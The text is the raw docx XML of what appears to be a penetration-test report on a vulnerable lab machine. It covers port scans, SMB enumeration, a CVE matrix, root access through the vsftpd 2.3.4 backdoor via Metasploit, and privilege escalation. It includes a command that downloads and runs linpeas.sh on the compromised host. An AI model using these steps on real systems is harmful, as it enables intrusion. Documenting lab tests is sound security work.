        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>performs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full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>three-way</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>handshake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determine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>if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port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open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Though</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reliable,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easily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>detectable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>completes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connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/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38775" cy="653415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8" w:lineRule="auto" w:before="210"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sends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SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>packet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handshake,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>making</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it significantly faster and less detectable than TCP Connect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Fingerprinting:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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192906</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5970378" cy="3992499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378" cy="3992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4361389</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5936014" cy="3180206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014" cy="3180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top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="22"/>
        <w:ind w:left="720" w:right="1959" w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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vulnerable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versions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later mapped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CVEs.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aggressive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>also</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>performed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detection,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scanning,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>traceroute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="249"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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192695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5941061" cy="3566541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61" cy="3566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302"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shares,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users,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groups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SMB protocol on ports 139/445.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="249"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>NSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Scripts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="306"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>automatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CVEs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>present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 target, including the vsftpd backdoor and Samba usermap vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/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3888" cy="389181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888" cy="389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92"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Discovered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="14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6"/>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="2336"/>
        <w:gridCol w:w="2341"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/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>Port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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/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Version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>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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21/tcp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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc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vsftpd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2.3.4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CRITICAL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Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490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22/tcp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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc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OpenSSH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4.7p1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</w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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80/tcp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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc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Apache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2.2.8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</w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="489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139/445/tcp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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc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Samba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3.0.20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CRITICAL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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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3306/tcp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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc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5.0.51a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</w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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5432/tcp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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc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8.3.x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</w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490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6667/tcp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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc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UnrealIRCd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CRITICAL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Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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8009/tcp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AJP</w:t>
            </w:r>
          </w:p>
        </w:tc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Apache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JServ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High</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="2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2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> Ghostcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="441" w:lineRule="auto" w:before="25"/>
        <w:ind w:right="4102"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Theft CVE Mapping &amp; Vulnerability Matrix:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="21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36791" cy="480917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6791" cy="48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6"/>
        <w:rPr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6"/>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="2336"/>
        <w:gridCol w:w="2341"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="105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>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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Exploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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vsftpd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2.3.4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CVE-2011-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105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10.0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Backdoor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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490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Samba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3.0.20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CVE-2007-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105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10.0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RCE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via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usermap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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Apache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2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341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Multiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="105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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341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Path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traversal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/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DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490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MySQL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5.x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CVE-2012-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105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6.5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Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="1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bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="314"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="306"/>
        <w:ind w:left="720" w:right="1500" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>providing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>immediate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root-level remote shell access.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1828800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>74223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3820904" cy="533400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904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712375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5908485" cy="2836830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485" cy="28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top="1420" w:bottom="280" w:left="720" w:right="360"/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1308" cy="294132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308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3"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="164"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="166"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Starting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>low-privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(www-data),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objective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escalate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root through system misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="249"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Automated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Enumeration: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892492</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>196304</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5987415" cy="352425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5987415" cy="3524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FF00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>wget</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId18">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Courier New"/>
                                  <w:color w:val="00FF00"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>https://github.com/carlospolop/PEASSng/releases/latest/download/linpeas.sh</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:spacing w:before="78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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>chmod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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>+x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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>linpeas.sh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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>&amp;&amp;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2"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
